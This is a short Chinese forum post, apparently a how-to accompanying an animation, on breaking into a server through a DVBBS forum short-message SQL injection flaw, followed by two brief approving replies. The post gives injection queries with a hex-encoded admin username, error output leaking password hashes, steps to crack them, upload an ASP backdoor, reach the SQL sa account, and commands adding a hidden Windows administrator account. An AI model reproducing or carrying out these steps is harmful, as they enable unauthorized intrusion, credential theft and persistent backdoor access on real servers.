利用dvbbs短消息漏洞入侵服务器动画

第一步:用注册好的用户名登陆,登陆时选择保存cookie,撰写短消息,保存 第二步:利用下边网页提交信息

username使用SQL Encoder编码,这里我们用一个管理员的名字radiofly 提交 select userpassword from [user] where username=0x72006100640069006f0066006c007900 and userpassword>7 得到 Microsoft VBScript 编译器错误 错误 '800a03f6' 缺少 'End' /iisHelp/common/500-100.asp，行242 Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 将 nvarchar 值 '78e4ea2181b00d21' 转换为数据类型为 int 的列时发生语法错误。 /bbs/messanger.asp，行619 78e4ea2181b00d21就是radiofly的前台密码 提交 select password from admin where username=0x72006100640069006f0066006c007900 and password>7 得到后台密码 acaa91f51ed197c7 用dvbbs密码猜解工具猜解密码 等待 等待 再等待。。。。。。ok 得到密码后登陆进入后台,修改文件上传类型,添加asp类型,上传asp后门 得到sql数据库的sa密码,使用sqlexec连接 net user admin$ xiaoxue /add net localgroup administrators admin$ /add 到此 over :) by 小路

好帖子

good ！